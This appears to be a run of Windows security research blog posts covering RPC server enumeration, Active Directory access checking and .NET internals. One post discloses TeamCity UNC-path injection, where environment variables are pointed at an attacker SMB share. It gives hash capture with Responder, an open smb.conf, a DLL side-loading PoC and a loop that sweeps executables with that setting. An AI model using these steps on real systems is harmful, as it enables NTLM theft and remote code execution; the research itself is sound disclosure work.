
Finding Running RPC Server Information with NtObjectManager

By: tiraniddo
26 June 2022 at 21:56

When doing security research I regularly use my NtObjectManager PowerShell module to discover and call RPC servers on Windows. Typically I'll use the Get-RpcServer command, passing the name of a DLL or EXE file to extract the embedded RPC servers. I can then use the returned server objects to create a client to access the server and call its methods. A good blog post about how some of this works was written recently by blueclearjar.

Using Get-RpcServer only gives you a list of what RPC servers could possibly be running, not whether they are running and, if so, in what process. This is where RpcView does better, as it parses a process' in-memory RPC structures to find what is registered and where. Unfortunately this is something I'm yet to implement in NtObjectManager.

However, it turns out there are various ways to get the running RPC server information, provided by the OS and the RPC runtime, which we can use to build a more or less complete list of running servers. I've exposed all the ones I know about with some recent updates to the module. Let's go through the various ways you can piece together this information.

NOTE: some of the examples of PowerShell code will need a recent build of the NtObjectManager module. For various reasons I've not been updating the version on the PS Gallery, so get the source code from github and build it yourself.

RPC Endpoint Mapper

If you're lucky this is the simplest way to find out if a particular RPC server is running. When an RPC server is started the service can register an RPC interface with the RpcEpRegister function, specifying the interface UUID and version along with the binding information, with the RPC endpoint mapper service running in RPCSS. This registers all current RPC endpoints the server is listening on, keyed against the RPC interface.

You can query the endpoint table using the RpcMgmtEpEltInqBegin and RpcMgmtEpEltInqNext APIs. I expose this through the Get-RpcEndpoint command. Running Get-RpcEndpoint with no parameters returns all interfaces the local endpoint mapper knows about as shown below.

PS> Get-RpcEndpoint
UUID                                 Version Protocol     Endpoint      Annotation
----                                 ------- --------     --------      ----------
51a227ae-825b-41f2-b4a9-1ac9557a1018 1.0     ncacn_ip_tcp 49669         
0497b57d-2e66-424f-a0c6-157cd5d41700 1.0     ncalrpc      LRPC-5f43...  AppInfo
201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0     ncalrpc      LRPC-5f43...  AppInfo
...

Note that in addition to the interface UUID and version the output shows the binding information for the endpoint, such as the protocol sequence and endpoint. There is also a free form annotation field, but that can be set to anything the server likes when it calls RpcEpRegister.

The APIs also allow you to specify a remote server hosting the endpoint mapper. You can use this to query what RPC servers are running on a remote server, assuming the firewall doesn't block you. To do this you'd need to specify a binding string for the SearchBinding parameter as shown.

PS> Get-RpcEndpoint -SearchBinding 'ncacn_ip_tcp:primarydc'
UUID                                 Version Protocol     Endpoint     Annotation
----                                 ------- --------     --------     ----------
d95afe70-a6d5-4259-822e-2c84da1ddb0d 1.0     ncacn_ip_tcp 49664
5b821720-f63b-11d0-aad2-00c04fc324db 1.0     ncacn_ip_tcp 49688
650a7e26-eab8-5533-ce43-9c1dfce11511 1.0     ncacn_np     \PIPE\ROUTER Vpn APIs
...

The big issue with the RPC endpoint mapper is it only contains RPC interfaces which were explicitly registered against an endpoint. The server could contain many more interfaces which could be accessible, but as they weren't registered they won't be returned from the endpoint mapper. Registration will typically only be used if the server is using an ephemeral name for the endpoint, such as a random TCP port or auto-generated ALPC name.

Pros:

  • Simple command to run to get a good list of running RPC servers.
  • Can be run against remote servers to find out remotely accessible RPC servers.
Cons:
  • Only returns the RPC servers intentionally registered.
  • Doesn't directly give you the hosting process, although the optional annotation might give you a clue.
  • Doesn't give you any information about what the RPC server does, you'll need to find what executable it's hosted in and parse it using Get-RpcServer.
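
To help with that last point, one option is to take an interface UUID from the endpoint mapper output and search the system DLLs for a matching parsed server. A rough sketch (assuming the parsed server objects expose the interface UUID through an InterfaceId property):

PS> $target = [Guid]'0497b57d-2e66-424f-a0c6-157cd5d41700' # AppInfo interface from above
PS> ls C:\Windows\System32\*.dll | ForEach-Object { Get-RpcServer $_.FullName -ErrorAction SilentlyContinue } | Where-Object { $_.InterfaceId -eq $target }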

Service Executable

If the RPC servers you extract are in a registered system service executable then the module will try and work out what service that corresponds to by querying the SCM. The default output from the Get-RpcServer command will show this as the Service column shown below.

PS> Get-RpcServer C:\windows\system32\appinfo.dll
Name        UUID                                 Ver Procs EPs Service Running
----        ----                                 --- ----- --- ------- -------
appinfo.dll 0497b57d-2e66-424f-a0c6-157cd5d41700 1.0 7     1   Appinfo True
appinfo.dll 58e604e8-9adb-4d2e-a464-3b0683fb1480 1.0 1     1   Appinfo True
appinfo.dll fd7a0523-dc70-43dd-9b2e-9c5ed48225b1 1.0 1     1   Appinfo True
appinfo.dll 5f54ce7d-5b79-4175-8584-cb65313a0e98 1.0 1     1   Appinfo True
appinfo.dll 201ef99a-7fa0-444c-9399-19ba84f12a1a 1.0 7     1   Appinfo True

The output also shows the appinfo.dll executable is the implementation of the Appinfo service, which is the general name for the UAC service. Note that it also shows whether the service is running, but that's just for convenience. You can use this information to find what process is likely to be hosting the RPC server by querying for the service PID if it's running.

PS> Get-Win32Service -Name Appinfo
Name    Status  ProcessId
----    ------  ---------
Appinfo Running 6020

The output also shows that each of the interfaces has an endpoint which is registered against the interface UUID and version. This is extracted from the endpoint mapper, so again it's only there for convenience. However, if you pick an executable which isn't a service implementation the results are less useful:

PS> Get-RpcServer C:\windows\system32\efslsaext.dll
Name          UUID                   Ver Procs EPs Service Running      
----          ----                   --- ----- --- ------- -------      
efslsaext.dll c681d488-d850-11d0-... 1.0 21    0           False

The efslsaext.dll library contains one of the EFS implementations, which are all hosted in LSASS. However, it's not a registered service so the output doesn't show any service name, and it's also not registered with the endpoint mapper so no endpoints are shown, even though it is running.

Pros:

  • If the executable's a service it gives you a good idea of who's hosting the RPC servers and if they're currently running.
  • You can get the RPC server interface information along with that information.
Cons:
  • If the executable isn't a service it doesn't directly help.
  • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
  • Even if the service is running it might not have enabled the RPC servers.

Enumerating Process Modules

Extracting the RPC servers from an arbitrary executable is fine offline, but what if you want to know what RPC servers are running right now? This is similar to RpcView's process list GUI: you can look at a process and find all the RPC servers running within it.

It turns out there's a really obvious way of getting a list of the potential servers running in a process: enumerate the loaded DLLs using an API such as EnumerateLoadedModules, and then run Get-RpcServer on each one to extract the potential servers. To use the APIs you'd need at least read access to the target process, which means you'd really want to be an administrator, but that's no different to RpcView's limitations.
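
As a rough sketch of that manual approach (assuming you can open the target process; 6020 is the Appinfo PID from earlier):

PS> $mods = (Get-Process -Id 6020).Modules | Select-Object -ExpandProperty FileName
PS> $mods | ForEach-Object { Get-RpcServer $_ -ErrorAction SilentlyContinue }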

The big problem is just because a module is loaded it doesn't mean the RPC server is running. For example the WinHTTP DLL has a built-in RPC server which is only loaded when running the WinHTTP proxy service, but the DLL could be loaded in any process which uses the APIs.

To simplify things I expose this approach through the Get-RpcServer function with the ProcessId parameter. You can also use the ServiceName parameter to lookup a service PID if you're interested in a specific service.

PS> Get-RpcServer -ServiceName Appinfo
Name        UUID                        Ver Procs EPs Service Running
----        ----                        --- ----- --- ------- -------
RPCRT4.dll  afa8bd80-7d8a-11c9-bef4-... 1.0 5     0           False
combase.dll e1ac57d7-2eeb-4553-b980-... 0.0 0     0           False
combase.dll 00000143-0000-0000-c000-... 0.0 0     0           False

Pros:

  • You can determine all RPC servers which could be potentially running for an arbitrary process.
Cons:
  • It doesn't ensure the RPC servers are running if they're not registered in the endpoint mapper. 
  • You can't directly enumerate the module list, except for the main executable, from a protected process (there are various tricks to do so, but they're out of scope here).

Asking an RPC Endpoint Nicely

The final approach is just to ask an RPC endpoint nicely to tell you what RPC servers it supports. We don't need to go digging into the guts of a process to do this; all we need is the binding string for the endpoint we want to query, which we can then pass to the RpcMgmtInqIfIds API.

This will only return the UUID and version of the RPC servers that are accessible from the endpoint, not the full RPC server information. But it will give you an exact list of all supported RPC servers; in fact it's so detailed it'll give you all the COM interfaces that the process is listening on as well. To query this list you only need access to the endpoint transport, not the process itself.

How do you get the endpoints though? One approach, if you do have access to the process, is to enumerate its server ALPC ports by getting a list of handles for the process, finding the ports with the \RPC Control\ prefix in their name and then using that to form the binding string. This approach is exposed through Get-RpcEndpoint's ProcessId parameter. Again it also supports a ServiceName parameter to simplify querying services.

PS> Get-RpcEndpoint -ServiceName AppInfo
UUID              Version Protocol Endpoint     
----              ------- -------- --------  
0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
...

If you don't have access to the process you can do it in reverse by enumerating potential endpoints and querying each one. For example you could enumerate the \RPC Control object directory and query each port you find. Since Windows 10 19H1, ALPC clients can query the server's PID, so you can not only find out the exposed RPC servers but also what process they're running in. To query from the name of an ALPC port use the AlpcPort parameter with Get-RpcEndpoint.

PS> Get-RpcEndpoint -AlpcPort LRPC-0ee3261d56342eb7ac
UUID              Version Protocol Endpoint     
----              ------- -------- --------  
0497b57d-2e66-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
201ef99a-7fa0-... 1.0     ncalrpc  \RPC Control\LRPC-0ee3...
...
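
If you want to sweep every ALPC port rather than query a single one, something along these lines should work (a sketch assuming the NtObject: drive exposed by the module and that port entries report a TypeName of "ALPC Port"):

PS> ls "NtObject:\RPC Control" | Where-Object TypeName -eq "ALPC Port" | ForEach-Object { Get-RpcEndpoint -AlpcPort $_.Name -ErrorAction SilentlyContinue }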

Pros:

  • You can determine exactly what RPC servers are running in a process.
Cons:
  • You can't directly determine what the RPC server does as the list gives you no information about which module is hosting it.

Combining Approaches

Obviously no one approach is perfect. However, you can get most of the way towards RpcView's process list by combining the module enumeration approach with asking the endpoint nicely. For example, you could first get a list of potential interfaces by enumerating the modules and parsing the RPC servers, then filter that list to only the ones which are running by querying the endpoint directly. This will also get you a list of the ALPC server ports that the RPC server is running on so you can directly connect to it with a manually built client. An example script for doing this is on github.
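
A minimal sketch of that combination for a single service process (using the Appinfo PID 6020 from earlier, and assuming both the server and endpoint objects expose an InterfaceId property):

PS> $potential = (Get-Process -Id 6020).Modules | ForEach-Object { Get-RpcServer $_.FileName -ErrorAction SilentlyContinue }
PS> $running = Get-RpcEndpoint -ProcessId 6020
PS> $potential | Where-Object { $_.InterfaceId -in $running.InterfaceId }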

We are still missing some crucial information that RpcView can access, such as the interface registration flags, with any of these approaches. Still, hopefully this gives you a few ways to approach analyzing the RPC attack surface of the local system and determining what endpoints you can call.

A case of DLL Side Loading from UNC via Windows environmental variable

5 July 2022 at 15:51

About a month ago I decided to take a look at JetBrains TeamCity, as I wanted to learn more about CVE-2022-25263 (an authenticated OS Command Injection in the Agent Push functionality).

Initially I just wanted to find the affected feature and test the mitigation put in place. Eventually I ended up searching for other interesting behaviors that could be considered security issues, and came across something I believed was a vulnerability. However, upon disclosure the vendor convinced me that the situation was considered normal in TeamCity's context and its threat model, since the feature I was testing allowed me to set some of the environment variables later passed to the given build step process (in my case python.exe).

During that process I accidentally discovered that Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed to by the SystemRoot environment variable passed to the process (it loads %SystemRoot%/system32/rsaenh.dll).

For the purpose of testing, I installed TeamCity on Windows 10 64-bit, with default settings, setting both the TeamCity Server and the TeamCity Build Agent to run as a regular user (which is the default setting).

I used the same system for both the TeamCity Server and the Build Agent.
First, as admin, I created a sample project with one build step of type Python.
I installed Python3 (python3.10 from the Microsoft App Store, checked the box to get it added to the PATH), so the agent would be compatible to run the build. I also created a hello world python build script:

From that point I switched to a regular user account, which was not allowed to define or edit build steps, but only to trigger them, with the ability to control custom build parameters (including some environmental variables).

I came across two separate instances of UNC path injection, allowing me to attack both the TeamCity Server and the Build Agent. In both cases I could make the system connect via SMB to the share of my choosing (allowing me to capture the NTLM hash, so I could try to crack it offline or SMB-relay it).

In case of build steps utilizing python, it also turned out possible to load an arbitrary DLL file from the share I set up with smbd hosted from the KALI box.


The local IP address of the Windows system was 192.168.99.4. I ran a KALI Linux box in the same network, under 192.168.99.5.

Injecting UNC to capture the hash / NTLM-relay

On the KALI box, I ran responder with default settings, like this:

Then, before running the build, I set the teamcity.build.checkoutDir parameter to \\192.168.99.5\pub:

I also ran Procmon and set up a filter to catch any events with the "Path" attribute containing "192.168.99.5".
I clicked "Run Build", which resulted in the UNC path being read by the service, as shown in the screenshot below:

Responder successfully caught the hash (multiple times):

I noticed that the teamcity.build.checkoutDir was validated and eventually it would not be used to attempt to load the build script (which was what I was trying to achieve in the first place by tampering with it), and the application fell back on the default value C:\TeamCity\buildAgent\work\2b35ac7e0452d98f when running the build. Still, before validation, the service interacted with the share, which I believe should not be the case.

Injecting UNC to load arbitrary DLL

I discovered I could attack the Build Agent by poisoning environmental variables the same way as I attacked the server, via build parameter customization.
Since my build step used python, I played with it a bit to see if I could influence the way it loads DLLs by changing environmental variables. It turned out I could.

Python on Windows can be used to side-load an arbitrary DLL named rsaenh.dll, placed in a directory named system32, located in a directory pointed by the SystemRoot environment variable passed to the process.

For example, by setting the SystemRoot environmental variable to "\\192.168.99.5\pub" (from the default "C:\WINDOWS" value):

In case of python3.10.exe, this resulted in the python executable trying to load \\192.168.99.5\pub\system32\rsaenh.dll:

With Responder running, just like in case of attacking the TeamCity Server, hashes were captured:

However, since python3.10 looked eager to load a DLL from a path that could be controlled with the SystemRoot variable, I decided to spin up an SMB share with public anonymous access and place a copy of the original rsaenh.dll file into the pub\system32\ directory shared over SMB.
I used the following /etc/samba/smb.conf:

[global]

workgroup = WORKGROUP
log file = /var/log/samba/log.%m
max log size = 1000
logging = file
panic action = /usr/share/samba/panic-action %d
server role = standalone server
map to guest = bad user
[pub]
comment = some useful files
read only = no
path = /home/pub
guest ok = yes
create mask = 0777
directory mask = 0777

I stopped Responder to free up port 445 and started smbd:

service smbd start

Then, I ran the build again, and had the python3.10 executable successfully load and execute the DLL from my share, demonstrating a vector of RCE on the Build Agent:

Not an issue from TeamCity perspective

About a week after reporting the issue to the vendor, I received a response, clarifying that any user having access to TeamCity is considered to have access to all build agent systems, therefore code execution on any build agent system, triggered by a low-privileged user in TeamCity, does not violate any security boundaries. They also provided an example of an earlier, very similar submission, and the clarification that was given upon its closure https://youtrack.jetbrains.com/issue/TW-74408 (with a nice code injection vector via a perl environment variable).

python loading rsaenh.dll following the SystemRoot env variable

The fact that python used an environment variable to load a DLL is an interesting occurrence on its own, as it could be used locally as an evasive technique, an alternative to rundll32.exe (https://attack.mitre.org/techniques/T1574/002/, https://attack.mitre.org/techniques/T1129/), to inject malicious code into a process created from an original, signed python3.10.exe executable.

POC

The following code was used to build the DLL. It simply grabs the current username and current process command line, and appends them to a text file named poc.txt. Whenever DllMain is executed, for whatever reason, the poc.txt file will be appended with a line containing those details:
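
A minimal DLL along these lines would do the job (an illustrative sketch rather than the exact code that was used):

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "Advapi32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // Grab the current user name and the command line of the hosting process
    char user[257] = { 0 };
    DWORD len = sizeof(user);
    GetUserNameA(user, &len);

    // Append a line with those details to poc.txt in the current directory
    FILE *f = fopen("poc.txt", "a");
    if (f != NULL)
    {
        fprintf(f, "%s: %s\n", user, GetCommandLineA());
        fclose(f);
    }

    return TRUE;
}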

First, let's try to get it loaded without any signatures, locally:
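
Something along these lines reproduces the local test (paths are illustrative; the compiled PoC is named rsaenh.dll):

mkdir C:\poc\system32
copy rsaenh.dll C:\poc\system32\
set SystemRoot=C:\poc
python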

Procmon output watching for any events with Path ending with "rsaenh.dll":

The poc.txt file was created in the current directory of  C:\Users\ewilded\HACKING\SHELLING\research\cmd.exe\python3_side_loading_via_SystemRoot while running python:

Similar cases

There must be more cases of popular software using environmental variables to locate some of the shared libraries they load.

To perform such a search dynamically, all executables in the scope directory could be iterated through and executed multiple times, each time testing arbitrary values set in individual common environment variables like %SystemRoot% or %WINDIR%. This alone would be a good approach for starters, but it would definitely not provide exhaustive coverage - most of the places in code where those load attempts happen are not reachable without hitting proper command lines, specific to each executable.
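
A crude version of that loop might look as follows (an illustrative sketch only; the load attempts would be observed in Procmon or on an SMB listener):

$probe = '\\192.168.99.5\pub'   # attacker-controlled share from the earlier examples
Get-ChildItem C:\Windows\System32\*.exe | ForEach-Object {
    $si = New-Object System.Diagnostics.ProcessStartInfo($_.FullName)
    $si.UseShellExecute = $false
    $si.EnvironmentVariables['SystemRoot'] = $probe
    try { [Diagnostics.Process]::Start($si) | Out-Null } catch {}
}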

A more exhaustive, but also more demanding, approach would be static analysis of all PE files in scope that indicate the usage of both LoadLibrary and GetEnv functions (e.g. LoadLibraryExW() and _wgetenv(), as python3.10.exe does) in their import tables.

Access Checking Active Directory

By: tiraniddo
17 July 2022 at 04:49

Like many Windows related technologies Active Directory uses a security descriptor and the access check process to determine what access a user has to parts of the directory. Each object in the directory contains an nTSecurityDescriptor attribute which stores the binary representation of the security descriptor. When a user accesses the object through LDAP the remote user's token is used with the security descriptor to determine if they have the rights to perform the operation they're requesting.

Weak security descriptors are a common misconfiguration that could result in the entire domain being compromised. Therefore it's important for an administrator to be able to find and remediate security weaknesses. Unfortunately Microsoft doesn't provide a means for an administrator to audit the security of AD, at least not in any default tool I know of. There is third-party tooling, such as Bloodhound, which will perform this analysis offline, but from reading the implementation of the checking they don't tend to use the real access check APIs and so likely miss some misconfigurations.

I wrote my own access checker for AD which is included in my NtObjectManager PowerShell module. I've used it to find a few vulnerabilities, such as CVE-2021-34470 which was an issue with Exchange's changes to AD. This works "online", as in you need to have an active account in the domain to run it, however AFAIK it should provide the most accurate results if what you're interested in is what access a specific user has to AD objects. While the command is available in the module it's perhaps not immediately obvious how to use it and interpret the results, therefore I decided I should write a quick blog post about it.

A Complex Process

The access check process is mostly documented by Microsoft in [MS-ADTS]: Active Directory Technical Specification. Specifically in section 5.1.3. However, this leaves many questions unanswered. I'm not going to go through how it works in full either, but let me give a quick overview.  I'm going to assume you have a basic knowledge of the structure of the AD and its objects.

An AD object contains many resources on which access might need to be granted or denied for a particular user. For example you might want to allow the user to create only certain types of child objects, or only modify certain attributes. There are many ways that Microsoft could have implemented security, but they decided on extending the ACL format to introduce the object ACE. For example the ACCESS_ALLOWED_OBJECT_ACE structure adds two GUIDs to the normal ACCESS_ALLOWED_ACE.

The first GUID, ObjectType, indicates the type of object that the ACE applies to. For example this can be set to the schema ID of an attribute, and the ACE will then grant access to only that attribute and nothing else. The second GUID, InheritedObjectType, is only used during ACL inheritance. It represents the schema ID of the object's class that is allowed to inherit this ACE. For example if it's set to the schema ID of the computer class, then the ACE will only be inherited if such a class is created; it will not be if, say, a user object is created instead. We only need to care about the first of these GUIDs when doing an access check.

To perform an access check you need to use an API such as AccessCheckByType which supports checking the object ACEs. When calling the API you pass a list of object type GUIDs you want to check for access on. When processing the DACL if an ACE has an ObjectType GUID which isn't in the passed list it'll be ignored. Otherwise it'll be handled according to the normal access check rules. If the ACE isn't an object ACE then it'll also be processed.

If all you want to do is check if a local user has access to a specific object or attribute then it's pretty simple. Just get the access token for that user, add the object's GUID to the list and call the access check API. The resulting granted access can be one of the following specific access rights; note the names in parentheses are the ones I use in the PowerShell module for simplicity:
  • ACTRL_DS_CREATE_CHILD (CreateChild) - Create a new child object
  • ACTRL_DS_DELETE_CHILD (DeleteChild) - Delete a child object
  • ACTRL_DS_LIST (List) - Enumerate child objects
  • ACTRL_DS_SELF (Self) - Grant a write-validated extended right
  • ACTRL_DS_READ_PROP (ReadProp) - Read an attribute
  • ACTRL_DS_WRITE_PROP (WriteProp) - Write an attribute
  • ACTRL_DS_DELETE_TREE (DeleteTree) - Delete a tree of objects
  • ACTRL_DS_LIST_OBJECT (ListObject) - List a tree of objects
  • ACTRL_DS_CONTROL_ACCESS (ControlAccess) - Grant a control extended right
You can also be granted standard rights such as READ_CONTROL, WRITE_DAC or DELETE which do what you'd expect them to do. However, if you want to see what the maximum granted access on the DC would be it's slightly more difficult. We have the following problems:
  • The list of groups granted to a local user is unlikely to match what they're granted on the DC where the real access check takes place.
  • AccessCheckByType only returns a single granted access value; if we have a lot of object types to test it'd be quite expensive to call it hundreds if not thousands of times for a single security descriptor.
While you could solve the first problem by having sufficient local privileges to manually create an access token, and the second by using an API which returns a list of granted access such as AccessCheckByTypeResultList, there's a "simpler" solution. You can use the Authz APIs: these allow you to manually build a security context with any groups you like without needing to create an access token, and the AuthzAccessCheck API supports returning a list of granted access for each object in the type list. It just so happens that this API is the one used by the AD LDAP server itself.

Therefore to perform a "correct" maximum access check you need to do the following steps.
  1. Enumerate the user's group list for the DC from the AD. Local group assignments are stored in the directory's CN=Builtin container.
  2. Build an Authz security context with the group list.
  3. Read a directory object's security descriptor.
  4. Read the object's schema class and build a list of specific schema objects to check:
  • All attributes from the class and its super, auxiliary and dynamic auxiliary classes.
  • All allowable child object classes.
  • All assignable control, write-validated and property set extended rights.
  5. Convert the gathered schema information into the object type list for the access check.
  6. Run the access check and handle the results.
  7. Repeat from 3 for every object you want to check.

Trust me when I say this process is actually easier said than done. There are many nuances that produce surprising results; I guess this is why most tooling just doesn't bother. Also my code includes a fair amount of knowledge gathered from reverse engineering the real implementation, but I'm sure I could have missed something.

    Using Get-AccessibleDsObject and Interpreting the Results

    Let's finally get to using the PowerShell command which is the real purpose of this blog post. For a simple check run the following command. This can take a while on the first run to gather information about the domain and the user.

    PS> Get-AccessibleDsObject -NamingContext Default
    Name   ObjectClass UserName       Modifiable Controllable
    ----   ----------- --------       ---------- ------------
    domain domainDNS   DOMAIN\alice   False      True

    This uses the NamingContext property to specify what object to check. The property allows you to easily specify the three main directories, Default, Configuration and Schema. You can also use the DistinguishedName property to specify an explicit DN. Also the Domain property is used to specify the domain for the LDAP server if you don't want to inspect the current user's domain. You can also specify the Recurse property to recursively enumerate objects, in this case we just access check the root object.

    The access check defaults to using the current user's groups, based on what they would be on the DC. This is obviously important, especially if the current user is a local administrator as they wouldn't be guaranteed to have administrator rights on the DC. You can specify different users to check either by SID using the UserSid property, or names using the UserName property. These properties can take multiple values which will run multiple checks against the list of enumerated objects. For example to check using the domain administrator you could do the following:

    PS> Get-AccessibleDsObject -NamingContext Default -UserName DOMAIN\Administrator
    Name   ObjectClass UserName             Modifiable Controllable
    ----   ----------- --------             ---------- ------------
    domain domainDNS   DOMAIN\Administrator True       True

    The basic table format for the access check results shows five columns: the common name of the object, its schema class, the user that was checked, and whether the access check resulted in any modifiable or controllable access being granted. Modifiable covers things like being able to write attributes or create/delete child objects. Controllable indicates one or more controllable extended rights were granted to the user, such as allowing the user's password to be changed.

    As this is PowerShell the access check result is an object with many properties. The following properties are probably the ones of most interest when determining what access is granted to the user.
    • GrantedAccess - The granted access when only specifying the object's schema class during the check. If an access is granted at this level it'd apply to all values of that type, for example if WriteProp is granted then any attribute in the object can be written by the user.
    • WritableAttributes - The list of attributes a user can modify.
    • WritablePropertySets - The list of writable property sets a user can modify. Note that this is more for information purposes, the modifiable attributes will also be in the WritableAttributes property which is going to be easier to inspect.
    • GrantedControl - The list of control extended rights granted to a user.
    • GrantedWriteValidated - The list of write validated extended rights granted to a user.
    • CreateableClasses - The list of child object classes that can be created.
    • DeletableClasses - The list of child object classes that can be deleted.
    • DistinguishedName - The full DN of the object.
    • SecurityDescriptor - The security descriptor used for the check.
    • TokenInfo - The user's information used in the check, such as the list of groups.
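
    For example, to pull out just the objects where the checked user ends up with some modifiable or controllable access, something along these lines should work (a sketch built on the properties listed above):

    PS> $rs = Get-AccessibleDsObject -NamingContext Default -Recurse
    PS> $rs | Where-Object { $_.WritableAttributes -or $_.GrantedControl } | Select-Object Name, UserName, WritableAttributes, GrantedControl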
    The command should be pretty easy to use. That said, it does come with a few caveats. First you can only use the command with direct access to the AD using a domain account. Technically there's no reason you couldn't implement a gatherer like Bloodhound and do the access check offline, but I just haven't. I've also not tested it in weirder setups such as complex domain hierarchies or RODCs.

    If you're using a low-privileged user there are likely to be AD objects that you can't enumerate or read the security descriptor from. This means the results are going to depend on the user you use to enumerate with. The best results would come from using a domain/enterprise administrator with full access to everything.

    Based on my testing, when I've found an access being granted to a user it seems to be real, however it's possible I'm not always 100% correct or that I'm missing accesses. Also it's worth noting that just having access doesn't mean there isn't some extra checking done by the LDAP server. For example there's an explicit block on creating Group Managed Service Accounts in Computer objects, even though that will appear to be a creatable child object.

    Simple CIL Opcode Execution in PowerShell using the DynamicMethod Class and Delegates

    2 October 2013 at 00:09
    tl;dr version

    It is possible to assemble .NET methods with CIL opcodes (i.e. .NET bytecode) in PowerShell in only a few lines of code using dynamic methods and delegates.



    I’ll admit, I have a love/hate relationship with PowerShell. I love that it is the most powerful scripting language and shell but at the same time, I often find quirks in the language that consistently bother me. One such quirk is the fact that integers don’t wrap when they overflow. Rather, they saturate – they are cast into the next largest type that can accommodate them. To demonstrate what I mean, observe the following:
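
    A quick check of the result types in the console makes the behavior clear:

    [Int16]::MaxValue.GetType().FullName    # System.Int16
    ([Int16]::MaxValue + 1).GetType().FullName    # System.Int32
    [Int16]::MaxValue + 1    # 32768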


    You’ll notice that [Int16]::MaxValue (i.e. 0x7FFF) understandably remains an Int16. However, rather than wrapping when adding one, it is upcast to an Int32. Admittedly, this is probably the behavior that most PowerShell users would desire. I, on the other hand wish I had the option to perform math on integers that wrapped. To solve this, I originally thought that I would have to write an addition function using complicated binary logic. I opted not to go that route and decided to assemble a function using raw CIL (common intermediate language) opcodes. What follows is a brief explanation of how to accomplish this task.


    Common Intermediate Language Basics

    CIL is the bytecode that describes .NET methods. A description of all the opcodes implemented by Microsoft can be found here. Every time you call a method in .NET, the runtime either interprets its opcodes or it executes the assembly language equivalent of those opcodes (as a result of the JIT process - just-in-time compilation). The calling convention for CIL is loosely related to how calls are made in X86 assembly – arguments are pushed onto a stack, a method is called, and a return value is returned to the caller.

    Since we’re on the subject of addition, here are the CIL opcodes that would add two numbers of similar type together and would wrap in the case of an overflow:

    IL_0000: Ldarg_0 // Loads the argument at index 0 onto the evaluation stack.
    IL_0001: Ldarg_1 // Loads the argument at index 1 onto the evaluation stack.
    IL_0002: Add // Adds two values and pushes the result onto the evaluation stack.
    IL_0003: Ret // Returns from the current method, pushing a return value (if present) from the callee's evaluation stack onto the caller's evaluation stack.

    Per Microsoft documentation, “integer addition wraps, rather than saturates” when using the Add instruction. This is the behavior I was after in the first place. Now let’s learn how to build a method in PowerShell that uses these opcodes.


    Dynamic Methods

    In the System.Reflection.Emit namespace, there is a DynamicMethod class that allows you to create methods without having to first go through the steps of creating an assembly and module. This is nice when you want a quick and dirty way to assemble and execute CIL opcodes. When creating a DynamicMethod object, you will need to provide the following arguments to its constructor:

    1) The name of the method you want to create
    2) The return type of the method
    3) An array of types that will serve as the parameters

    The following PowerShell command will satisfy those requirements for an addition function:

    $MethodInfo = New-Object Reflection.Emit.DynamicMethod('UInt32Add', [UInt32], @([UInt32], [UInt32]))

    Here, I am creating an empty method that will take two UInt32 variables as arguments and return a UInt32.

    Next, I will actually implement the logic of the method by emitting the CIL opcodes into the method:

    $ILGen = $MethodInfo.GetILGenerator()
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Add)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)

    Now that the logic of the method is complete, I need to create a delegate from the $MethodInfo object. Before this can happen, I need to create a delegate in PowerShell that matches the method signature for the UInt32Add method. This can be accomplished by creating a generic Func delegate with the following convoluted syntax:

    $Delegate = [Func``3[UInt32, UInt32, UInt32]]

    The previous command states that I want to create a delegate for a function that accepts two UInt32 arguments and returns a UInt32. Note that the Func delegate wasn't introduced until .NET 3.5 which means that this technique will only work in PowerShell 3+. With that, we can now bind the method to the delegate:

    $UInt32Add = $MethodInfo.CreateDelegate($Delegate)

    And now, all we have to do is call the Invoke method to perform normal integer math that wraps upon an overflow:

    $UInt32Add.Invoke([UInt32]::MaxValue, 2)

    Here is the code in its entirety:
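
    Pieced together from the snippets above, it only takes a few lines:

    $MethodInfo = New-Object Reflection.Emit.DynamicMethod('UInt32Add', [UInt32], @([UInt32], [UInt32]))
    $ILGen = $MethodInfo.GetILGenerator()
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Add)
    $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)
    $Delegate = [Func``3[UInt32, UInt32, UInt32]]
    $UInt32Add = $MethodInfo.CreateDelegate($Delegate)
    $UInt32Add.Invoke([UInt32]::MaxValue, 2)    # wraps to 1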


    For additional information regarding the techniques I described, I encourage you to read the following articles:

    Introduction to IL Assembly Language
    Reflection Emit Dynamic Method Scenarios
    How to: Define and Execute Dynamic Methods

    Reverse Engineering InternalCall Methods in .NET

    16 November 2013 at 19:52
    Often times, when attempting to reverse engineer a particular .NET method, I will hit a wall because I’ll dig in far enough into the method’s implementation that I’ll reach a private method marked [MethodImpl(MethodImplOptions.InternalCall)]. For example, I was interested in seeing how the .NET framework loads PE files in memory via a byte array using the System.Reflection.Assembly.Load(Byte[]) method. When viewed in ILSpy (my favorite .NET decompiler), it will show the following implementation:
     
     
    So the first thing it does is check to see if you’re allowed to load a PE image in the first place via the CheckLoadByteArraySupported method. Basically, if the executing assembly is a tile app, then you will not be allowed to load a PE file as a byte array. It then calls the RuntimeAssembly.nLoadImage method. If you click on this method in ILSpy, you will be disappointed to find that there does not appear to be a managed implementation.
     
     
